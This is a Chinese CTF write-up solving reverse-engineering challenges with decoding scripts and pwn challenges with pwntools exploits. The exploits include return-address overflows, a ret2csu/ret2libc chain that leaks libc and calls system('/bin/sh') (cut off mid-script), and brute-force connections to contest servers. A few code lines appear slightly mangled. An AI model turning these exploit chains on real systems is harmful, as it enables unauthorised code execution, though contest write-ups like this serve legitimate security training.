前言
第一次和Jay17师傅搭档,被带飞咯,呜呜呜TuT~~~~~
羡慕会web的师傅
Reverse
shiftjmp
去花,打包,反编译
a = [ 0x53, 0x58, 0x41, 0x78, 0x53, 0x36, 0x6A, 0x64, 0x38, 0x64,
0x6F, 0x54, 0x78, 0x42, 0x51, 0x7B, 0x78, 0x22, 0x4D, 0x61,
0x27, 0x63, 0x73, 0x45, 0x2D, 0x7C, 0x45, 0x6C, 0x2C, 0x6F,
0x2F, 0x7B, 0x5E, 0x5C, 0x00]
flag = ''
for i in range(len(a)):
flag += chr(a[i] ^ i)
print(flag)
#SYC{W3lc0me_tO_th3_r3veR5e_w0r1d~}
点击就送的逆向题
先对文件进行编译
分析,获取flag
a = 'Z`J[X^LMNO`PPJPVQRSIUTJ]IMNOZKMM'
flag = ''
for i in range(len(a)):
flag += chr(ord(a[i]) - 7)
print(flag)
# SYCTQWEFGHYIICIOJKLBNMCVBFGHSDFF
# flag:SYC{TQWEFGHYIICIOJKLBNMCVBFGHSDFF}
easymath
爆破flag字符串,逐个拼接猜测
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<map>
#include<vector>
#include<queue>
#include<stack>
#include<set>
#include<string>
#include<cstring>
#include<list>
#include<stdlib.h>
using namespace std;
typedef int status;
typedef int selemtype;
int matrix[25] = {18, 29, 16, 19, 27, 8, 31, 8, 23, 30, 29, 3, 28, 10, 21, 18, 29, 8, 16, 28, 11, 30, 7, 20, 7};
int last[30] = {0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 16, 19, 22, 26, 27, 28, 29, 31, 32, 50, 51, 52, 53, 54, 55};
unsigned int ans[66] = {0};
int v7[5][5] = {0};
char tabel[] = "01234_asdzxcpoityumnbAOZWXGMY";
int main () {
for (int i = 0 ; i <= 4 ; i ++ ) {
for (int x1 = 1 ; x1 < 30 ; x1 ++ ) {
for (int x2 = 1 ; x2 < 30 ; x2 ++ ) {
for (int x3 = 1 ; x3 < 30 ; x3 ++ ) {
for (int x4 = 1 ; x4 < 30 ; x4 ++ ) {
for (int x5 = 1 ; x5 < 30; x5 ++ ) {
int flag = 1;
for (int j = 0 ; j <= 4 ; j ++ ) {
v7[i][j] = 0;
ans[5 * i + 0 ] = last[x1];
ans[5 * i + 1 ] = last[x2];
ans[5 * i + 2 ] = last[x3];
ans[5 * i + 3 ] = last[x4];
ans[5 * i + 4 ] = last[x5];
for (int k = 0 ; k <= 4 ; k ++ ) {
v7[i][j] = (v7[i][j] + ans[5 * i + k] * matrix[5 * k + j]) & 0x1f;
}
if (i == j && v7[i][j] != 1) {
flag = 0;
break;
}
if (i != j && v7[i][j]) {
flag = 0;
break;
}
}
if (flag) {
printf("%c%c%c%c%c,", tabel[x1 - 1], tabel[x2 - 1], tabel[x3 - 1], tabel[x4 - 1], tabel[x5 - 1]);
}
}
}
}
}
}
cout << endl;
}
}
最终得到flag为xtd4co_ymiunbbx3Aypsmbzii
(一个个测试出来的,没看之后的更新附件,所有会有多解情况)
幸运数字
和exe交互爆破,因为提示字符中含有SYC字符,这里我们需要绕过一下
import subprocess
for i in range(1000):
enc = str(i)
process = subprocess.Popen("c:\\Users\\yu\\Desktop\\幸运数字.exe", stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
input_data = enc.encode('utf-8')
process.stdin.write(input_data)
process.stdin.flush()
output, error = process.communicate()
try:
flag = output.decode('gbk')
if flag.count("SYC") >= 2:
print("Correct flag found:", flag)
exit(0)
except:
pass
# SYC{C0ngratulati0nnnns_You_gAessEd_R1ght}
听说cpp很难
找到关键算法处
连猜带蒙编写脚本
a = [0x4D, 0x5F, 0x3D, 0x85, 0x37, 0x68, 0x73, 0x57,
0x27, 0x68, 0x51, 0x59, 0x7F, 0x26, 0x6B, 0x59,
0x73, 0x57, 0x55, 0x5B, 0x59, 0x6F, 0x6A, 0x59,
0x27, 0x57, 0x72, 0x57, 0x4F, 0x57, 0x78, 0x78, 0x83]
flag = ''
for i in range(len(a)):
flag += chr(((a[i] + 10) ^ 10) - 10)
print(flag)
# SYC{Anma1nG_y0u_maKe_it_1alaIa~~}
后面的-10是和SYC包裹匹配出来的
砍树
先用jadx打开分析,
so文件的分析
大概猜测逻辑为输入和7为的key异或,直接猜测key为Syclove
a = [ 0x00, 0x20, 0x20, 0x17, 0x1B, 0x36, 0x0E, 0x36, 0x26, 0x17,
0x04, 0x2A, 0x29, 0x07, 0x26, 0x15, 0x52, 0x33, 0x2D, 0x0F,
0x3A, 0x27, 0x11, 0x06, 0x33, 0x07, 0x46, 0x17, 0x3D, 0x0A,
0x3C, 0x38, 0x2E, 0x22, 0x18]
key = 'Syclove'
flag = ''
for i in range(len(a)):
flag += chr(a[i] ^ ord(key[i % 7]))
print(flag)
# SYC{t@ke_thE_bul1_By_the_h0rns_TAT}
flower-or-tea
去花,打包,反编译
修改了输出的tea
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<map>
#include<vector>
#include<queue>
#include<stack>
#include<set>
#include<string>
#include<cstring>
#include<list>
#include<stdlib.h>
using namespace std;
typedef int status;
typedef int selemtype;
int delta = 0x31415927;
void decrypt(uint32_t* v, uint32_t* k) {
uint32_t v3 = v[0];
uint32_t v4 = v[1];
uint32_t sum = (54 * delta) & 0xffffffff;
int i = 0;
for (i = 0; i < 54; i++) {
sum -= delta;
v3 -= (k[sum & 3] + sum) ^ (v4 + ((v4 >> 5) ^ (16 * v4)));
v4 -= sum ^ (k[(sum >> 11) & 3] + sum) ^ (v3 + ((v3 >> 5) ^ (16 * v3)));
}
v[0] = v3;
v[1] = v4;
}
int main() {
uint32_t key[4] = { 32, 27, 39, 44 };
uint32_t array[38] = { 0x9AF9464B, 0xC417B89E, 0xB217A713, 0xC93BA9E8, 0x94F3E44E, 0xB5CC2AB5, 0x4451E42C, 0x7A8A289A, 0x53C8D008, 0x6E117B49, 0x9BFFD794, 0x5EFF2DF9, 0x17E72531, 0xDFBD9979, 0x8F871B3A, 0x73E8C5AC, 0xB28670A6, 0x5AF6A369, 0x2CF7DA24, 0x347B66AF, 0xB9C84D60, 0x911E912F, 0xBD5A2F9B, 0xCB96733A, 0xC59968BE, 0xA00013E9, 0xC12F4EA4, 0xDE863A10, 0xA0C4D594, 0x4380983C, 0x7E2F7648, 0xE54DDC89, 0x3F27A690, 0xB58D3199, 0x604AE517, 0x9C903984, 0xF4E04481, 0x3CF4EDFF}; //密码数据
uint32_t temp[2] = { 0 };
int i = 0;
for (i = 0; i < 38; i += 2) {
temp[0] = array[i];
temp[1] = array[i + 1];
decrypt(temp, key);
printf("%c%c%c%c%c%c%c%c", *((char*)&temp[0] + 0), *((char*)&temp[0] + 1), *((char*)&temp[0] + 2), *((char*)&temp[0] + 3), *((char*)&temp[1] + 0), *((char*)&temp[1] + 1), *((char*)&temp[1] + 2), *((char*)&temp[1] + 3));
}
return 0;
}
得到一个乱序的字符串,重新排序即可
a = 'S}Y?C?{ADe0t__Yro3vw_o1liFk_ek_nTioR_d'
flag1 , flag2 = '',''
for i in range(len(a)//2):
flag1 += a[i * 2]
flag2 += a[i * 2 + 1]
print(flag1,flag2)
# SYC{D0_Yov_1ike_To_ }??Aet_r3wolF_kniRd
print(flag1+flag2[::-1])
# SYC{D0_Yov_1ike_To_dRink_Flow3r_teA??}
myself
调试过smc,修改函数返回地址
打包,找到tea加密
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<map>
#include<vector>
#include<queue>
#include<stack>
#include<set>
#include<string>
#include<cstring>
#include<list>
#include<stdlib.h>
using namespace std;
typedef int status;
typedef int selemtype;
int delta = 0x61C88647;
void decrypt(uint32_t* v, uint32_t* k) {
uint32_t v3 = v[0];
uint32_t v4 = v[1];
uint32_t sum = ((32 * -delta) & 0xffffffff);
int i = 0;
for (i = 0; i < 32; i++) {
v4 -= ((v3 >> 5) + k[3]) ^ (16 * v3 + k[2]) ^ (sum + v3);
v3 -= ((v4 >> 5) + k[0]) ^ (16 * v4 + k[1]) ^ (sum + v4);
sum += delta;
}
v[0] = v3;
v[1] = v4;
}
int main() {
uint32_t key[4] = { 2, 2, 3, 4 };
uint32_t array[] = { 0x0BDBDF9F0, 0x0E26194C4, 0x80799125, 0x1F0FC219, 0x0EB6A1815, 0x84F572C5, 0x40CC3A85, 0x0D2A32ABB}; //密码数据
uint32_t temp[2] = { 0 };
int i = 0;
for (i = 0; i < 38; i += 2) {
temp[0] = array[i];
temp[1] = array[i + 1];
decrypt(temp, key);
printf("%c%c%c%c%c%c%c%c", *((char*)&temp[0] + 0), *((char*)&temp[0] + 1), *((char*)&temp[0] + 2), *((char*)&temp[0] + 3), *((char*)&temp[1] + 0), *((char*)&temp[1] + 1), *((char*)&temp[1] + 2), *((char*)&temp[1] + 3));
}
return 0;
}
rainrow
d810去混淆
a = [0x65, 0x58, 0x41, 0x8E, 0x50, 0x44, 0x7B, 0x62, 0x57, 0x4A,
0x7E, 0x54, 0x49, 0x6C, 0x7D, 0x84, 0x4F, 0x5B, 0x95, 0x60,
0x60, 0x64, 0x77, 0x48, 0x7D, 0x4D, 0x7B, 0x9F, 0x68, 0x3C,
0x2D, 0x62]
b = []
flag = ''
for i in range(len(a)):
b.append(a[i] ^ i)
if i % 3 == 0:
flag += chr(b[i] - 18)
else:
flag += chr(b[i])
print(flag)
# SYC{TAke_1t_3asy_Just_a_STart!!}
或者用angr爆破
import angr
import sys
def main(argv):
path_to_binary = './rainbow'
project = angr.Project(path_to_binary)
initial_state = project.factory.entry_state(
add_options={
angr.options.SYMBOL_FILL_UNCONSTRAINED_MEMORY,
angr.options.SYMBOL_FILL_UNCONSTRAINED_REGISTERS
}
)
simulation = project.factory.simgr(initial_state)
def is_successful(state):
stdout_output = state.posix.dumps(sys.stdout.fileno())
return b'You win!sunshine after the rain!' in stdout_output
def should_abort(state):
stdout_output = state.posix.dumps(sys.stdout.fileno())
return b'Try again!' in stdout_output or b'Oops!Check your input length.' in stdout_output
simulation.explore(find=is_successful, avoid=should_abort)
if simulation.found:
solution_state = simulation.found[0]
print(solution_state.posix.dumps(sys.stdin.fileno()).decode())
else:
raise Exception('Could not find the solution')
if __name__ == '__main__':
main(sys.argv)
小黄鸭
pyc拆包,反编译
直接开爆有一位错误,直接开猜
arr = '~h|p4gs`gJdN`thPwR`jDn`te1w`2|RNH'
a = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789}{_'
flag = ''
for i in range(len(arr)):
for j in range(len(a)):
if a[j].isalpha():
c = a[j]
c = chr(ord(c) + 13 - 26 if ord(c) + 13 > (90 if c <= 'Z' else 122) else ord(c) + 13)
b = chr(ord(c) + 2)
else:
b = chr(ord(a[j]) + 1)
if b == arr[i]:
flag += a[j]
break
print(flag[::-1])
# SYCm1_h0pe_yOu_ChAse_YoUr_dr3ams}
# SYC{1_h0pe_yOu_ChAse_YoUr_dr3ams}
寻找未来初音
go语言,开调,百度搜索未来初音色为0x39c5bb
RC4加密,idapython一把梭
from idaapi import *
addr = 0x61FD10 #输入的地址
a = [0x25, 0x6F, 0x3D, 0x6C, 0xF9, 0xE0, 0xCF, 0x3F, 0x2E,
0x24, 0xC6, 0x7B, 0x81, 0xBF, 0x55, 0x4F, 0x0D, 0x99,
0x87, 0x47, 0x48, 0xF7, 0xB9, 0x98, 0xFB, 0x1B, 0x22, 0xEC, 0x84, 0x23, 0xFD, 0xB2]
for i in range(len(a)):
patch_byte(addr+i,a[i])
浪漫至死不渝
找到关键代码
可知对key进行的栅栏加密,然后对输入的下表进行判断,然后与key异或,最后加10或者加99
a = [125, 130, 131, 122, 117, 110, 123, 125, 130, 131, 122, 117, 110, 123, 99, 99, 99, 99]
key = "5201314WXHN"
for i in range(len(a)):
if i < 14:
a[i] -= 10
a[i] ^= ord(key[i%7])
else:
a[i] -= 99
a[i] ^= ord(key[i-7])
flag = ''
for i in range(len(a)):
flag += chr(a[i])
print(flag)
#FJIAXUEFJIAXUEWXHN
AES!AES?
关键代码
分析可知,程序将我们的输入截成了两段进行加密,但加密过程都相同,根据伪C搓出exp即可
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<map>
#include<vector>
#include<queue>
#include<stack>
#include<set>
#include<string>
#include<cstring>
#include<list>
#include<stdlib.h>
using namespace std;
typedef int status;
typedef int selemtype;
unsigned char key[32] = {0x64, 0x6F, 0x5F, 0x79, 0x6F, 0x75, 0x5F, 0x6B, 0x6F, 0x6E, 0x77, 0x5F, 0x53, 0x59, 0x43, 0x3F, 0x27, 0xC7, 0x90, 0xCF, 0xC7, 0xE8, 0x90, 0x14, 0xC7, 0xF1, 0x82, 0x90, 0xBE, 0x92, 0x59, 0x4A};
unsigned char S[256] = {0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76, 0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0, 0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15, 0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75, 0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84, 0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF, 0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8, 0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2, 0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73, 0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB, 0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79, 0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08, 0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A, 0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E, 0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF, 0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16};
unsigned char enc[32] = {0xE0, 0x05, 0x6E, 0xC2, 0x6E, 0x99, 0x68, 0x45, 0x7D, 0x1F, 0x3F, 0xF9, 0x97, 0x76, 0x3B, 0x92, 0x47, 0x44, 0x06, 0x67, 0xA8, 0xEB, 0xEC, 0x4A, 0x6F, 0xE8, 0x35, 0xF9, 0xAC, 0xA7, 0x8C, 0x71};
void ShiftRow() {
unsigned char v1;
// 前15个字符
for (int i = 0; i < 16; i += 4) {
for (int j = i / 4; j > 0; j--) {
v1 = enc[i + 3];
for (int k = 2; k >= 0; k--) {
enc[i + k + 1] = enc[i + k];
}
enc[i] = v1;
}
}
// 剩余字符
for (int i = 16; i < 32; i += 4) {
for (int j = (i - 16) / 4; j > 0; j--) {
v1 = enc[i + 3];
for (int k = 2; k >= 0; k--) {
enc[i + k + 1] = enc[i + k];
}
enc[i] = v1;
}
}
}
void SBOX() {
for (int i = 0; i < 32; i++) {
for (int j = 0; j < 256; j++) {
if (enc[i] == S[j]) {
enc[i] = j;
break;
}
}
}
}
int SBOXINtranform(unsigned char a) {
for (int i = 0; i < 256; i++) {
if (a == S[i]) {
return i;
}
}
return -1;
}
void tranform() {
unsigned char v5[32] = {0x00};
int v9 = 16;
for (int j = 3; j >= 0; j--) {
for (int k = 3; k >= 0; k--) {
v9--;
unsigned char a1 = enc[v9];
int v2 = SBOXINtranform(a1);
v5[4 * k + j] = v2;
}
}
v9 = 32;
for (int j = 3; j >= 0; j--) {
for (int k = 3; k >= 0; k--) {
v9--;
unsigned char a1 = enc[v9];
int v2 = SBOXINtranform(a1);
v5[16 + 4 * k + j] = v2;
}
}
for (int i = 0; i < 32; i++) {
enc[i] = v5[i];
}
}
int main() {
for (int i = 0; i < 16; i++) {
enc[i] ^= key[16 + i];
enc[i + 16] ^= key[16 + i];
}
ShiftRow();
SBOX();
for (int i = 0; i < 16; i++) {
enc[i] ^= key[i];
enc[i + 16] ^= key[i];
}
tranform();
ShiftRow();
SBOX();
for (int i = 0; i < 32; i++) {
printf("%c", enc[i]);
}
return 0;
}
//SYC{0.o_Thls_1s_?t_A3s_(q^_^p)}
ezandroid
先对程序做个简单的分析,找到关键代码,还原代码,即可得到一段flag
#include<iostream>
#include<algorithm>
#include<cstdio>
#include<cmath>
#include<map>
#include<vector>
#include<queue>
#include<stack>
#include<set>
#include<string>
#include<cstring>
#include<list>
#include<stdlib.h>
using namespace std;
typedef int status;
typedef int selemtype;
void decrypt(int *v, int *k) {
int v0 = v[0], v1 = v[2], v2 = v[1], sum = 0x9E3779B9 * 64, i;
int delta = 0x9E3779B9;
int k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];
for (i = 0; i < 32; i++) {
v1 -= (((v2 << 4) + k2) ^ (v2 + sum)) ^ ((v2 >> 5) + k3);
v2 -= (((v1 << 4) + k0) ^ (v1 + sum)) ^ ((v1 >> 5) + k1);
sum -= delta;
}
for (i = 0; i < 32; i++) {
v1 -= (((v0 << 4) + k2) ^ (v0 + sum)) ^ ((v0 >> 5) + k3);
v0 -= (((v1 << 4) + k0) ^ (v1 + sum)) ^ ((v1 >> 5) + k1);
sum -= delta;
}
v[0] = v0;
v[1] = v1;
v[2] = v2;
}
void swap(char* x, char* y) {
char temp = *x;
*x = *y;
*y = temp;
}
int main() {
char enc[12] = {-91, -8, -110, -55, -49, 75, 115, 13, -76, -113, 102, 80};
int key[4] = {2023708229, -158607964, -2120859654, 1167043672};
for (int i = 0; i < 3; i++) {
swap(&enc[4 * i], &enc[4 * i + 3]);
swap(&enc[4 * i + 1], &enc[4 * i + 2]);
}
int *flag1 = (int *)enc;
decrypt(flag1, key);
for (int i = 0; i < 3; i++) {
swap(&enc[4 * i], &enc[4 * i + 3]);
swap(&enc[4 * i + 1], &enc[4 * i + 2]);
}
for (int i = 0; i < 12; i++) {
putchar(enc[i]);
}
return 0;
}
//T0Vt33Tn0itr
这边是另一段,一个简单的异或
a = [-91, -8, -110, -55, -49, 75, 115, 13, -76, -113, 102, 80]
b = [-107, -106, -95, -115, -119, 127, 26, 121, -62, -20, 86, 9]
for i in range(len(b)):
print(chr(a[i] ^ b[i]),end='')
# 0n3DF4itvc0Y
最后将两段字符串交叉拼接即可获得flag
a = 'T0Vt33Tn0itr'
b = '0n3DF4itvc0Y'
flag = ''
for i in range(len(a)):
flag += a[i]
flag += b[i]
print(flag)
# T00nV3tD3F34Tint0vict0rY
是男人就来扎针
Unity开发的游戏,主要逆向点在于Assembly-CSharp文件使用DNSPY打开
主要逻辑代码,到100分输出flag,但是每次鼠标点击事件都会导致flag更新,所以我们要更改代码模拟鼠标点击时间
在看到GameOver函数全部改为flase
保存之后运行游戏就可以了
Pwn
nc_pwntools
pwntools的基本用法
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',31163)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/')
chooselibc = 0
pwnlibc = 0
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b main') #断点调试
#gdb.attach(io,'b *$rebase(0x128B)') #PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
io.send(b'a'(99 - 7) + b'Syclover')
io.recvuntil(b'((')
num1 = int(io.recvuntil(b'-',drop=True),10)
num2 = int(io.recvuntil(b')',drop=True),10)
num3 = int(io.recvuntil(b')% ',drop=True),10)
num4 = int(io.recvuntil(b'=',drop=True),10)
io.sendline(str(((num1 - num2)num3)%num4))
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
password
爆破
for i in range(1000):
io = remote('pwn.node.game.sycsec.com',31200)
payload = b'a' * 0x28 + p64(0x4012F3)
io.sendlineafter(b'name:\n',payload)
io.sendlineafter(b'password:\n','')
a = io.recvline()
if b"Wrong password!\n" in a:
io.close()
elif b"Correct password!" in a:
io.interactive()
ret2text
开了pie,直接修改最后两位返回地址到后面函数
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 4
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/ret2text')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('pwn.node.game.sycsec.com',30492)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/ret2text')
chooselibc = 0
pwnlibc = 1
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b *$rebase(0x126F)') #断点调试/PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
payload = b'a' * 0x58 + p8(0x27)
io.send(payload)
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
write1
调试计算输入的值
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 1
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/chal')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('112.6.51.212',32892)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/chal')
chooselibc = 0
pwnlibc = 1
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/Libc/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b *0x401290') #断点调试/PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
backdoor = 0x401225
io.sendline(b'a')
#25 = 4d + x
io.sendlineafter('index:',str(0x28))
io.sendlineafter('value:',b'-28')
#12 = 13 + x
io.sendlineafter('index:',str(0x29))
io.sendlineafter('value:',b'-1')
io.sendlineafter('index:',str(-1))
#----------------------------------------------------------
#pause()
#----------------------------------------------------------
io.interactive()
ret2libc
from pwn import *
from LibcSearcher import *
from ctypes import *
from struct import pack
import time
context(os='linux', arch='amd64', log_level='debug')
local = 1
if(local == 0): #本地练习
io = process('./pwn')
elif(local == 1): #比赛本地方便替换
io = process('/home/yu/CTF/PWN/chal')
elif(local == 2): #NSSCTF
io = remote('node4.anna.nssctf.cn',28186)
elif(local == 3): #BUUCTF
io = remote('node4.buuoj.cn',28067)
else: #比赛远程
io = remote('pwn.node.game.sycsec.com',30492)
elfnum = 1
if(elfnum == 0): #日常练习
elf = ELF('./pwn')
else: #比赛方便更换
elf = ELF('/home/yu/CTF/PWN/chal')
chooselibc = 0
pwnlibc = 1
match chooselibc:
case 0:
if(pwnlibc == 0): #其他版本
libc = ELF('/home/yu/CTF/PWN/libc.so.6')
else: #本地
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
case 1: #16.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.23-x64.so')
case 2: #18.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.27-x64.so')
case 3: #19.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.29-x64.so')
case 4: #20.04
if(pwnlibc == 0):
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x32.so')
else:
libc = ELF('/home/yu/CTF/PWN/Libc/libc-2.30-x64.so')
def debug():
gdb.attach(io)
pause()
#----------------------------------------------------------
#调试
#gdb.attach(io,'b *0x40137D') #断点调试/PIE调试
#gdb.attach(io) #程序调试
#----------------------------------------------------------
ret = 0x40101a
rdi = 0x401333
write_plt = elf.plt['write']
write_got = elf.got['write']
main = elf.sym['vuln']
csu_pop = 0x40132A #rbx,rbp,r12,r13,r14,r15
csu_mov = 0x401310
payload = b'\x00' + b'a' * 0x17 + p64(csu_pop) + p64(0) + p64(1) + p64(1) + p64(write_got) + p64(8) + p64(write_got) + p64(csu_mov) + b'a' * 56 + p64(main)
io.sendlineafter('backdoor!',payload)
write_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
base = write_addr - libc.sym['write']
system = base + libc.sym['system']
binsh = base + next(libc.search(b'/bin/sh\x00'))
payload1 = b'\x00' + b'a' * 0x17 + p64(ret) + p64(rdi) + p64(binsh) + p64(system)
